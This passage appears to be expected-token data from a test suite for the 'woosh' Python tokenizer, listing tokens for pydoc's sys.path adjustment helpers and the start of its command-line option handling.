woosh.Token(woosh.NAME, 'serverthread', 2721, 16, 2721, 28),
woosh.Token(woosh.OP, '.', 2721, 28, 2721, 29),
woosh.Token(woosh.NAME, 'stop', 2721, 29, 2721, 33),
woosh.Token(woosh.OP, '(', 2721, 33, 2721, 34),
woosh.Token(woosh.OP, ')', 2721, 34, 2721, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2721, 35, 2722, 0),
woosh.Token(woosh.NAME, 'print', 2722, 16, 2722, 21),
woosh.Token(woosh.OP, '(', 2722, 21, 2722, 22),
woosh.Token(woosh.STRING, "'Server stopped'", 2722, 22, 2722, 38),
woosh.Token(woosh.OP, ')', 2722, 38, 2722, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2722, 39, 2723, 0),
woosh.Token(woosh.COMMENT, '# -------------------------------------------------- command-line interface', 2725, 0, 2725, 75),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.NAME, 'def', 2727, 0, 2727, 3),
woosh.Token(woosh.NAME, 'ispath', 2727, 4, 2727, 10),
woosh.Token(woosh.OP, '(', 2727, 10, 2727, 11),
woosh.Token(woosh.NAME, 'x', 2727, 11, 2727, 12),
woosh.Token(woosh.OP, ')', 2727, 12, 2727, 13),
woosh.Token(woosh.OP, ':', 2727, 13, 2727, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 2727, 14, 2728, 0),
woosh.Token(woosh.INDENT, ' ', 2728, 0, 2728, 4),
woosh.Token(woosh.NAME, 'return', 2728, 4, 2728, 10),
woosh.Token(woosh.NAME, 'isinstance', 2728, 11, 2728, 21),
woosh.Token(woosh.OP, '(', 2728, 21, 2728, 22),
woosh.Token(woosh.NAME, 'x', 2728, 22, 2728, 23),
woosh.Token(woosh.OP, ',', 2728, 23, 2728, 24),
woosh.Token(woosh.NAME, 'str', 2728, 25, 2728, 28),
woosh.Token(woosh.OP, ')', 2728, 28, 2728, 29),
woosh.Token(woosh.NAME, 'and', 2728, 30, 2728, 33),
woosh.Token(woosh.NAME, 'x', 2728, 34, 2728, 35),
woosh.Token(woosh.OP, '.', 2728, 35, 2728, 36),
woosh.Token(woosh.NAME, 'find', 2728, 36, 2728, 40),
woosh.Token(woosh.OP, '(', 2728, 40, 2728, 41),
woosh.Token(woosh.NAME, 'os', 2728, 41, 2728, 43),
woosh.Token(woosh.OP, '.', 2728, 43, 2728, 44),
woosh.Token(woosh.NAME, 'sep', 2728, 44, 2728, 47),
woosh.Token(woosh.OP, ')', 2728, 47, 2728, 48),
woosh.Token(woosh.OP, '>=', 2728, 49, 2728, 51),
woosh.Token(woosh.NUMBER, '0', 2728, 52, 2728, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2728, 53, 2729, 0),
woosh.Token(woosh.DEDENT, '', 2730, 0, 2730, 0),
woosh.Token(woosh.NAME, 'def', 2730, 0, 2730, 3),
woosh.Token(woosh.NAME, '_get_revised_path', 2730, 4, 2730, 21),
woosh.Token(woosh.OP, '(', 2730, 21, 2730, 22),
woosh.Token(woosh.NAME, 'given_path', 2730, 22, 2730, 32),
woosh.Token(woosh.OP, ',', 2730, 32, 2730, 33),
woosh.Token(woosh.NAME, 'argv0', 2730, 34, 2730, 39),
woosh.Token(woosh.OP, ')', 2730, 39, 2730, 40),
woosh.Token(woosh.OP, ':', 2730, 40, 2730, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2730, 41, 2731, 0),
woosh.Token(woosh.INDENT, ' ', 2731, 0, 2731, 4),
woosh.Token(woosh.STRING, '"""Ensures current directory is on returned path, and argv0 directory is not\r\n\r\n Exception: argv0 dir is left alone if it\'s also pydoc\'s directory.\r\n\r\n Returns a new path entry list, or None if no adjustment is needed.\r\n """', 2731, 4, 2736, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2736, 7, 2737, 0),
woosh.Token(woosh.COMMENT, "# Scripts may get the current directory in their path by default if they're", 2737, 4, 2737, 79),
woosh.Token(woosh.COMMENT, '# run with the -m switch, or directly from the current directory.', 2738, 4, 2738, 69),
woosh.Token(woosh.COMMENT, '# The interactive prompt also allows imports from the current directory.', 2739, 4, 2739, 76),
woosh.Token(woosh.COMMENT, "# Accordingly, if the current directory is already present, don't make", 2741, 4, 2741, 74),
woosh.Token(woosh.COMMENT, '# any changes to the given_path', 2742, 4, 2742, 35),
woosh.Token(woosh.NAME, 'if', 2743, 4, 2743, 6),
woosh.Token(woosh.STRING, "''", 2743, 7, 2743, 9),
woosh.Token(woosh.NAME, 'in', 2743, 10, 2743, 12),
woosh.Token(woosh.NAME, 'given_path', 2743, 13, 2743, 23),
woosh.Token(woosh.NAME, 'or', 2743, 24, 2743, 26),
woosh.Token(woosh.NAME, 'os', 2743, 27, 2743, 29),
woosh.Token(woosh.OP, '.', 2743, 29, 2743, 30),
woosh.Token(woosh.NAME, 'curdir', 2743, 30, 2743, 36),
woosh.Token(woosh.NAME, 'in', 2743, 37, 2743, 39),
woosh.Token(woosh.NAME, 'given_path', 2743, 40, 2743, 50),
woosh.Token(woosh.NAME, 'or', 2743, 51, 2743, 53),
woosh.Token(woosh.NAME, 'os', 2743, 54, 2743, 56),
woosh.Token(woosh.OP, '.', 2743, 56, 2743, 57),
woosh.Token(woosh.NAME, 'getcwd', 2743, 57, 2743, 63),
woosh.Token(woosh.OP, '(', 2743, 63, 2743, 64),
woosh.Token(woosh.OP, ')', 2743, 64, 2743, 65),
woosh.Token(woosh.NAME, 'in', 2743, 66, 2743, 68),
woosh.Token(woosh.NAME, 'given_path', 2743, 69, 2743, 79),
woosh.Token(woosh.OP, ':', 2743, 79, 2743, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 2743, 80, 2744, 0),
woosh.Token(woosh.INDENT, ' ', 2744, 0, 2744, 8),
woosh.Token(woosh.NAME, 'return', 2744, 8, 2744, 14),
woosh.Token(woosh.NAME, 'None', 2744, 15, 2744, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 2744, 19, 2745, 0),
woosh.Token(woosh.COMMENT, '# Otherwise, add the current directory to the given path, and remove the', 2746, 4, 2746, 76),
woosh.Token(woosh.COMMENT, "# script directory (as long as the latter isn't also pydoc's directory.", 2747, 4, 2747, 75),
woosh.Token(woosh.DEDENT, ' ', 2748, 0, 2748, 4),
woosh.Token(woosh.NAME, 'stdlib_dir', 2748, 4, 2748, 14),
woosh.Token(woosh.OP, '=', 2748, 15, 2748, 16),
woosh.Token(woosh.NAME, 'os', 2748, 17, 2748, 19),
woosh.Token(woosh.OP, '.', 2748, 19, 2748, 20),
woosh.Token(woosh.NAME, 'path', 2748, 20, 2748, 24),
woosh.Token(woosh.OP, '.', 2748, 24, 2748, 25),
woosh.Token(woosh.NAME, 'dirname', 2748, 25, 2748, 32),
woosh.Token(woosh.OP, '(', 2748, 32, 2748, 33),
woosh.Token(woosh.NAME, '__file__', 2748, 33, 2748, 41),
woosh.Token(woosh.OP, ')', 2748, 41, 2748, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2748, 42, 2749, 0),
woosh.Token(woosh.NAME, 'script_dir', 2749, 4, 2749, 14),
woosh.Token(woosh.OP, '=', 2749, 15, 2749, 16),
woosh.Token(woosh.NAME, 'os', 2749, 17, 2749, 19),
woosh.Token(woosh.OP, '.', 2749, 19, 2749, 20),
woosh.Token(woosh.NAME, 'path', 2749, 20, 2749, 24),
woosh.Token(woosh.OP, '.', 2749, 24, 2749, 25),
woosh.Token(woosh.NAME, 'dirname', 2749, 25, 2749, 32),
woosh.Token(woosh.OP, '(', 2749, 32, 2749, 33),
woosh.Token(woosh.NAME, 'argv0', 2749, 33, 2749, 38),
woosh.Token(woosh.OP, ')', 2749, 38, 2749, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2749, 39, 2750, 0),
woosh.Token(woosh.NAME, 'revised_path', 2750, 4, 2750, 16),
woosh.Token(woosh.OP, '=', 2750, 17, 2750, 18),
woosh.Token(woosh.NAME, 'given_path', 2750, 19, 2750, 29),
woosh.Token(woosh.OP, '.', 2750, 29, 2750, 30),
woosh.Token(woosh.NAME, 'copy', 2750, 30, 2750, 34),
woosh.Token(woosh.OP, '(', 2750, 34, 2750, 35),
woosh.Token(woosh.OP, ')', 2750, 35, 2750, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2750, 36, 2751, 0),
woosh.Token(woosh.NAME, 'if', 2751, 4, 2751, 6),
woosh.Token(woosh.NAME, 'script_dir', 2751, 7, 2751, 17),
woosh.Token(woosh.NAME, 'in', 2751, 18, 2751, 20),
woosh.Token(woosh.NAME, 'given_path', 2751, 21, 2751, 31),
woosh.Token(woosh.NAME, 'and', 2751, 32, 2751, 35),
woosh.Token(woosh.NAME, 'not', 2751, 36, 2751, 39),
woosh.Token(woosh.NAME, 'os', 2751, 40, 2751, 42),
woosh.Token(woosh.OP, '.', 2751, 42, 2751, 43),
woosh.Token(woosh.NAME, 'path', 2751, 43, 2751, 47),
woosh.Token(woosh.OP, '.', 2751, 47, 2751, 48),
woosh.Token(woosh.NAME, 'samefile', 2751, 48, 2751, 56),
woosh.Token(woosh.OP, '(', 2751, 56, 2751, 57),
woosh.Token(woosh.NAME, 'script_dir', 2751, 57, 2751, 67),
woosh.Token(woosh.OP, ',', 2751, 67, 2751, 68),
woosh.Token(woosh.NAME, 'stdlib_dir', 2751, 69, 2751, 79),
woosh.Token(woosh.OP, ')', 2751, 79, 2751, 80),
woosh.Token(woosh.OP, ':', 2751, 80, 2751, 81),
woosh.Token(woosh.NEWLINE, '\r\n', 2751, 81, 2752, 0),
woosh.Token(woosh.INDENT, ' ', 2752, 0, 2752, 8),
woosh.Token(woosh.NAME, 'revised_path', 2752, 8, 2752, 20),
woosh.Token(woosh.OP, '.', 2752, 20, 2752, 21),
woosh.Token(woosh.NAME, 'remove', 2752, 21, 2752, 27),
woosh.Token(woosh.OP, '(', 2752, 27, 2752, 28),
woosh.Token(woosh.NAME, 'script_dir', 2752, 28, 2752, 38),
woosh.Token(woosh.OP, ')', 2752, 38, 2752, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2752, 39, 2753, 0),
woosh.Token(woosh.DEDENT, ' ', 2753, 0, 2753, 4),
woosh.Token(woosh.NAME, 'revised_path', 2753, 4, 2753, 16),
woosh.Token(woosh.OP, '.', 2753, 16, 2753, 17),
woosh.Token(woosh.NAME, 'insert', 2753, 17, 2753, 23),
woosh.Token(woosh.OP, '(', 2753, 23, 2753, 24),
woosh.Token(woosh.NUMBER, '0', 2753, 24, 2753, 25),
woosh.Token(woosh.OP, ',', 2753, 25, 2753, 26),
woosh.Token(woosh.NAME, 'os', 2753, 27, 2753, 29),
woosh.Token(woosh.OP, '.', 2753, 29, 2753, 30),
woosh.Token(woosh.NAME, 'getcwd', 2753, 30, 2753, 36),
woosh.Token(woosh.OP, '(', 2753, 36, 2753, 37),
woosh.Token(woosh.OP, ')', 2753, 37, 2753, 38),
woosh.Token(woosh.OP, ')', 2753, 38, 2753, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2753, 39, 2754, 0),
woosh.Token(woosh.NAME, 'return', 2754, 4, 2754, 10),
woosh.Token(woosh.NAME, 'revised_path', 2754, 11, 2754, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2754, 23, 2755, 0),
woosh.Token(woosh.COMMENT, '# Note: the tests only cover _get_revised_path, not _adjust_cli_path itself', 2757, 0, 2757, 75),
woosh.Token(woosh.DEDENT, '', 2758, 0, 2758, 0),
woosh.Token(woosh.NAME, 'def', 2758, 0, 2758, 3),
woosh.Token(woosh.NAME, '_adjust_cli_sys_path', 2758, 4, 2758, 24),
woosh.Token(woosh.OP, '(', 2758, 24, 2758, 25),
woosh.Token(woosh.OP, ')', 2758, 25, 2758, 26),
woosh.Token(woosh.OP, ':', 2758, 26, 2758, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2758, 27, 2759, 0),
woosh.Token(woosh.INDENT, ' ', 2759, 0, 2759, 4),
woosh.Token(woosh.STRING, '"""Ensures current directory is on sys.path, and __main__ directory is not.\r\n\r\n Exception: __main__ dir is left alone if it\'s also pydoc\'s directory.\r\n """', 2759, 4, 2762, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2762, 7, 2763, 0),
woosh.Token(woosh.NAME, 'revised_path', 2763, 4, 2763, 16),
woosh.Token(woosh.OP, '=', 2763, 17, 2763, 18),
woosh.Token(woosh.NAME, '_get_revised_path', 2763, 19, 2763, 36),
woosh.Token(woosh.OP, '(', 2763, 36, 2763, 37),
woosh.Token(woosh.NAME, 'sys', 2763, 37, 2763, 40),
woosh.Token(woosh.OP, '.', 2763, 40, 2763, 41),
woosh.Token(woosh.NAME, 'path', 2763, 41, 2763, 45),
woosh.Token(woosh.OP, ',', 2763, 45, 2763, 46),
woosh.Token(woosh.NAME, 'sys', 2763, 47, 2763, 50),
woosh.Token(woosh.OP, '.', 2763, 50, 2763, 51),
woosh.Token(woosh.NAME, 'argv', 2763, 51, 2763, 55),
woosh.Token(woosh.OP, '[', 2763, 55, 2763, 56),
woosh.Token(woosh.NUMBER, '0', 2763, 56, 2763, 57),
woosh.Token(woosh.OP, ']', 2763, 57, 2763, 58),
woosh.Token(woosh.OP, ')', 2763, 58, 2763, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2763, 59, 2764, 0),
woosh.Token(woosh.NAME, 'if', 2764, 4, 2764, 6),
woosh.Token(woosh.NAME, 'revised_path', 2764, 7, 2764, 19),
woosh.Token(woosh.NAME, 'is', 2764, 20, 2764, 22),
woosh.Token(woosh.NAME, 'not', 2764, 23, 2764, 26),
woosh.Token(woosh.NAME, 'None', 2764, 27, 2764, 31),
woosh.Token(woosh.OP, ':', 2764, 31, 2764, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2764, 32, 2765, 0),
woosh.Token(woosh.INDENT, ' ', 2765, 0, 2765, 8),
woosh.Token(woosh.NAME, 'sys', 2765, 8, 2765, 11),
woosh.Token(woosh.OP, '.', 2765, 11, 2765, 12),
woosh.Token(woosh.NAME, 'path', 2765, 12, 2765, 16),
woosh.Token(woosh.OP, '[', 2765, 16, 2765, 17),
woosh.Token(woosh.OP, ':', 2765, 17, 2765, 18),
woosh.Token(woosh.OP, ']', 2765, 18, 2765, 19),
woosh.Token(woosh.OP, '=', 2765, 20, 2765, 21),
woosh.Token(woosh.NAME, 'revised_path', 2765, 22, 2765, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2765, 34, 2766, 0),
woosh.Token(woosh.DEDENT, '', 2768, 0, 2768, 0),
woosh.Token(woosh.DEDENT, '', 2768, 0, 2768, 0),
woosh.Token(woosh.NAME, 'def', 2768, 0, 2768, 3),
woosh.Token(woosh.NAME, 'cli', 2768, 4, 2768, 7),
woosh.Token(woosh.OP, '(', 2768, 7, 2768, 8),
woosh.Token(woosh.OP, ')', 2768, 8, 2768, 9),
woosh.Token(woosh.OP, ':', 2768, 9, 2768, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 2768, 10, 2769, 0),
woosh.Token(woosh.INDENT, ' ', 2769, 0, 2769, 4),
woosh.Token(woosh.STRING, '"""Command-line interface (looks at sys.argv to decide what to do)."""', 2769, 4, 2769, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 2769, 74, 2770, 0),
woosh.Token(woosh.NAME, 'import', 2770, 4, 2770, 10),
woosh.Token(woosh.NAME, 'getopt', 2770, 11, 2770, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2770, 17, 2771, 0),
woosh.Token(woosh.NAME, 'class', 2771, 4, 2771, 9),
woosh.Token(woosh.NAME, 'BadUsage', 2771, 10, 2771, 18),
woosh.Token(woosh.OP, '(', 2771, 18, 2771, 19),
woosh.Token(woosh.NAME, 'Exception', 2771, 19, 2771, 28),
woosh.Token(woosh.OP, ')', 2771, 28, 2771, 29),
woosh.Token(woosh.OP, ':', 2771, 29, 2771, 30),
woosh.Token(woosh.NAME, 'pass', 2771, 31, 2771, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2771, 35, 2772, 0),
woosh.Token(woosh.NAME, '_adjust_cli_sys_path', 2773, 4, 2773, 24),
woosh.Token(woosh.OP, '(', 2773, 24, 2773, 25),
woosh.Token(woosh.OP, ')', 2773, 25, 2773, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2773, 26, 2774, 0),
woosh.Token(woosh.NAME, 'try', 2775, 4, 2775, 7),
woosh.Token(woosh.OP, ':', 2775, 7, 2775, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 2775, 8, 2776, 0),
woosh.Token(woosh.INDENT, ' ', 2776, 0, 2776, 8),
woosh.Token(woosh.NAME, 'opts', 2776, 8, 2776, 12),
woosh.Token(woosh.OP, ',', 2776, 12, 2776, 13),
woosh.Token(woosh.NAME, 'args', 2776, 14, 2776, 18),
woosh.Token(woosh.OP, '=', 2776, 19, 2776, 20),
woosh.Token(woosh.NAME, 'getopt', 2776, 21, 2776, 27),
woosh.Token(woosh.OP, '.', 2776, 27, 2776, 28),
woosh.Token(woosh.NAME, 'getopt', 2776, 28, 2776, 34),
woosh.Token(woosh.OP, '(', 2776, 34, 2776, 35),
woosh.Token(woosh.NAME, 'sys', 2776, 35, 2776, 38),
woosh.Token(woosh.OP, '.', 2776, 38, 2776, 39),
woosh.Token(woosh.NAME, 'argv', 2776, 39, 2776, 43),
woosh.Token(woosh.OP, '[', 2776, 43, 2776, 44),
woosh.Token(woosh.NUMBER, '1', 2776, 44, 2776, 45),
woosh.Token(woosh.OP, ':', 2776, 45, 2776, 46),
woosh.Token(woosh.OP, ']', 2776, 46, 2776, 47),
woosh.Token(woosh.OP, ',', 2776, 47, 2776, 48),
woosh.Token(woosh.STRING, "'bk:n:p:w'", 2776, 49, 2776, 59),
woosh.Token(woosh.OP, ')', 2776, 59, 2776, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2776, 60, 2777, 0),
woosh.Token(woosh.NAME, 'writing', 2777, 8, 2777, 15),
woosh.Token(woosh.OP, '=', 2777, 16, 2777, 17),
woosh.Token(woosh.NAME, 'False', 2777, 18, 2777, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2777, 23, 2778, 0),
woosh.Token(woosh.NAME, 'start_server', 2778, 8, 2778, 20),
woosh.Token(woosh.OP, '=', 2778, 21, 2778, 22),
woosh.Token(woosh.NAME, 'False', 2778, 23, 2778, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2778, 28, 2779, 0),
woosh.Token(woosh.NAME, 'open_browser', 2779, 8, 2779, 20),
woosh.Token(woosh.OP, '=', 2779, 21, 2779, 22),
woosh.Token(woosh.NAME, 'False', 2779, 23, 2779, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2779, 28, 2780, 0),
woosh.Token(woosh.NAME, 'port', 2780, 8, 2780, 12),
woosh.Token(woosh.OP, '=', 2780, 13, 2780, 14),
woosh.Token(woosh.NUMBER, '0', 2780, 15, 2780, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2780, 16, 2781, 0),
woosh.Token(woosh.NAME, 'hostname', 2781, 8, 2781, 16),
woosh.Token(woosh.OP, '=', 2781, 17, 2781, 18),
woosh.Token(woosh.STRING, "'localhost'", 2781, 19, 2781, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2781, 30, 2782, 0),
woosh.Token(woosh.NAME, 'for', 2782, 8, 2782, 11),
woosh.Token(woosh.NAME, 'opt', 2782, 12, 2782, 15),
woosh.Token(woosh.OP, ',', 2782, 15, 2782, 16),
woosh.Token(woosh.NAME, 'val', 2782, 17, 2782, 20),
woosh.Token(woosh.NAME, 'in', 2782, 21, 2782, 23),
woosh.Token(woosh.NAME, 'opts', 2782, 24, 2782, 28),
woosh.Token(woosh.OP, ':', 2782, 28, 2782, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2782, 29, 2783, 0),
woosh.Token(woosh.INDENT, ' ', 2783, 0, 2783, 12),
woosh.Token(woosh.NAME, 'if', 2783, 12, 2783, 14),
woosh.Token(woosh.NAME, 'opt', 2783, 15, 2783, 18),
woosh.Token(woosh.OP, '==', 2783, 19, 2783, 21),
woosh.Token(woosh.STRING, "'-b'", 2783, 22, 2783, 26),
woosh.Token(woosh.OP, ':', 2783, 26, 2783, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2783, 27, 2784, 0),
woosh.Token(woosh.INDENT, ' ', 2784, 0, 2784, 16),
woosh.Token(woosh.NAME, 'start_server', 2784, 16, 2784, 28),
woosh.Token(woosh.OP, '=', 2784, 29, 2784, 30),
woosh.Token(woosh.NAME, 'True', 2784, 31, 2784, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2784, 35, 2785, 0),
woosh.Token(woosh.NAME, 'open_browser', 2785, 16, 2785, 28),
woosh.Token(woosh.OP, '=', 2785, 29, 2785, 30),
woosh.Token(woosh.NAME, 'True', 2785, 31, 2785, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2785, 35, 2786, 0),
woosh.Token(woosh.DEDENT, ' ', 2786, 0, 2786, 12),
woosh.Token(woosh.NAME, 'if', 2786, 12, 2786, 14),
woosh.Token(woosh.NAME, 'opt', 2786, 15, 2786, 18),
woosh.Token(woosh.OP, '==', 2786, 19, 2786, 21),
woosh.Token(woosh.STRING, "'-k'", 2786, 22, 2786, 26),
woosh.Token(woosh.OP, ':', 2786, 26, 2786, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2786, 27, 2787, 0),
woosh.Token(woosh.INDENT, ' ', 2787, 0, 2787, 16),
woosh.Token(woosh.NAME, 'apropos', 2787, 16, 2787, 23),
woosh.Token(woosh.OP, '(', 2787, 23, 2787, 24),
woosh.Token(woosh.NAME, 'val', 2787, 24, 2787, 27),
woosh.Token(woosh.OP, ')', 2787, 27, 2787, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2787, 28, 2788, 0),
woosh.Token(woosh.NAME, 'return', 2788, 16, 2788, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2788, 22, 2789, 0),
woosh.Token(woosh.DEDENT, ' ', 2789, 0, 2789, 12),
woosh.Token(woosh.NAME, 'if', 2789, 12, 2789, 14),
woosh.Token(woosh.NAME, 'opt', 2789, 15, 2789, 18),
woosh.Token(woosh.OP, '==', 2789, 19, 2789, 21),
woosh.Token(woosh.STRING, "'-p'", 2789, 22, 2789, 26),
woosh.Token(woosh.OP, ':', 2789, 26, 2789, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2789, 27, 2790, 0),
woosh.Token(woosh.INDENT, ' ', 2790, 0, 2790, 16),
woosh.Token(woosh.NAME, 'start_server', 2790, 16, 2790, 28),
woosh.Token(woosh.OP, '=', 2790, 29, 2790, 30),
woosh.Token(woosh.NAME, 'True', 2790, 31, 2790, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2790, 35, 2791, 0),
woosh.Token(woosh.NAME, 'port', 2791, 16, 2791, 20),
woosh.Token(woosh.OP, '=', 2791, 21, 2791, 22),
woosh.Token(woosh.NAME, 'val', 2791, 23, 2791, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2791, 26, 2792, 0),
woosh.Token(woosh.DEDENT, ' ', 2792, 0, 2792, 12),
woosh.Token(woosh.NAME, 'if', 2792, 12, 2792, 14),
woosh.Token(woosh.NAME, 'opt', 2792, 15, 2792, 18),
woosh.Token(woosh.OP, '==', 2792, 19, 2792, 21),
woosh.Token(woosh.STRING, "'-w'", 2792, 22, 2792, 26),
woosh.Token(woosh.OP, ':', 2792, 26, 2792, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2792, 27, 2793, 0),
woosh.Token(woosh.INDENT, ' ', 2793, 0, 2793, 16),
woosh.Token(woosh.NAME, 'writing', 2793, 16, 2793, 23),
woosh.Token(woosh.OP, '=', 2793, 24, 2793, 25),
woosh.Token(woosh.NAME, 'True', 2793, 26, 2793, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2793, 30, 2794, 0),
woosh.Token(woosh.DEDENT, ' ', 2794, 0, 2794, 12),
woosh.Token(woosh.NAME, 'if', 2794, 12, 2794, 14),
woosh.Token(woosh.NAME, 'opt', 2794, 15, 2794, 18),
woosh.Token(woosh.OP, '==', 2794, 19, 2794, 21),
woosh.Token(woosh.STRING, "'-n'", 2794, 22, 2794, 26),
woosh.Token(woosh.OP, ':', 2794, 26, 2794, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2794, 27, 2795, 0),
woosh.Token(woosh.INDENT, ' ', 2795, 0, 2795, 16),
woosh.Token(woosh.NAME, 'start_server', 2795, 16, 2795, 28),
woosh.Token(woosh.OP, '=', 2795, 29, 2795, 30),
woosh.Token(woosh.NAME, 'True', 2795, 31, 2795, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2795, 35, 2796, 0),
woosh.Token(woosh.NAME, 'hostname', 2796, 16, 2796, 24),
woosh.Token(woosh.OP, '=', 2796, 25, 2796, 26),
woosh.Token(woosh.NAME, 'val', 2796, 27, 2796, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2796, 30, 2797, 0),
woosh.Token(woosh.DEDENT, ' ', 2798, 0, 2798, 8),
woosh.Token(woosh.DEDENT, '', 2798, 8, 2798, 8),
woosh.Token(woosh.NAME, 'if', 2798, 8, 2798, 10),
woosh.Token(woosh.NAME, 'start_server', 2798, 11, 2798, 23),
woosh.Token(woosh.OP, ':', 2798, 23, 2798, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2798, 24, 2799, 0),
woosh.Token(woosh.INDENT, ' ', 2799, 0, 2799, 12),
woosh.Token(woosh.NAME, 'browse', 2799, 12, 2799, 18),
woosh.Token(woosh.OP, '(', 2799, 18, 2799, 19),
woosh.Token(woosh.NAME, 'port', 2799, 19, 2799, 23),
woosh.Token(woosh.OP, ',', 2799, 23, 2799, 24),
woosh.Token(woosh.NAME, 'hostname', 2799, 25, 2799, 33),
woosh.Token(woosh.OP, '=', 2799, 33, 2799, 34),
woosh.Token(woosh.NAME, 'hostname', 2799, 34, 2799, 42),
woosh.Token(woosh.OP, ',', 2799, 42, 2799, 43),
woosh.Token(woosh.NAME, 'open_browser', 2799, 44, 2799, 56),
woosh.Token(woosh.OP, '=', 2799, 56, 2799, 57),
woosh.Token(woosh.NAME, 'open_browser', 2799, 57, 2799, 69),
woosh.Token(woosh.OP, ')', 2799, 69, 2799, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 2799, 70, 2800, 0),
woosh.Token(woosh.NAME, 'return', 2800, 12, 2800, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2800, 18, 2801, 0),
woosh.Token(woosh.DEDENT, ' ', 2802, 0, 2802, 8),
woosh.Token(woosh.NAME, 'if', 2802, 8, 2802, 10),
woosh.Token(woosh.NAME, 'not', 2802, 11, 2802, 14),
woosh.Token(woosh.NAME, 'args', 2802, 15, 2802, 19),
woosh.Token(woosh.OP, ':', 2802, 19, 2802, 20),
woosh.Token(woosh.NAME, 'raise', 2802, 21, 2802, 26),
woosh.Token(woosh.NAME, 'BadUsage', 2802, 27, 2802, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2802, 35, 2803, 0),
woosh.Token(woosh.NAME, 'for', 2803, 8, 2803, 11),
woosh.Token(woosh.NAME, 'arg', 2803, 12, 2803, 15),
woosh.Token(woosh.NAME, 'in', 2803, 16, 2803, 18),
woosh.Token(woosh.NAME, 'args', 2803, 19, 2803, 23),
woosh.Token(woosh.OP, ':', 2803, 23, 2803, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2803, 24, 2804, 0),
woosh.Token(woosh.INDENT, ' ', 2804, 0, 2804, 12),
woosh.Token(woosh.NAME, 'if', 2804, 12, 2804, 14),
woosh.Token(woosh.NAME, 'ispath', 2804, 15, 2804, 21),
woosh.Token(woosh.OP, '(', 2804, 21, 2804, 22),
woosh.Token(woosh.NAME, 'arg', 2804, 22, 2804, 25),
woosh.Token(woosh.OP, ')', 2804, 25, 2804, 26),
woosh.Token(woosh.NAME, 'and', 2804, 27, 2804, 30),
woosh.Token(woosh.NAME, 'not', 2804, 31, 2804, 34),
woosh.Token(woosh.NAME, 'os', 2804, 35, 2804, 37),
woosh.Token(woosh.OP, '.', 2804, 37, 2804, 38),
woosh.Token(woosh.NAME, 'path', 2804, 38, 2804, 42),
woosh.Token(woosh.OP, '.', 2804, 42, 2804, 43),
woosh.Token(woosh.NAME, 'exists', 2804, 43, 2804, 49),
woosh.Token(woosh.OP, '(', 2804, 49, 2804, 50),
woosh.Token(woosh.NAME, 'arg', 2804, 50, 2804, 53),
woosh.Token(woosh.OP, ')', 2804, 53, 2804, 54),
woosh.Token(woosh.OP, ':', 2804, 54, 2804, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2804, 55, 2805, 0),
woosh.Token(woosh.INDENT, ' ', 2805, 0, 2805, 16),
woosh.Token(woosh.NAME, 'print', 2805, 16, 2805, 21),
woosh.Token(woosh.OP, '(', 2805, 21, 2805, 22),
woosh.Token(woosh.STRING, "'file %r does not exist'", 2805, 22, 2805, 46),
woosh.Token(woosh.OP, '%', 2805, 47, 2805, 48),
woosh.Token(woosh.NAME, 'arg', 2805, 49, 2805, 52),
woosh.Token(woosh.OP, ')', 2805, 52, 2805, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2805, 53, 2806, 0),
woosh.Token(woosh.NAME, 'break', 2806, 16, 2806, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2806, 21, 2807, 0),
woosh.Token(woosh.DEDENT, ' ', 2807, 0, 2807, 12),
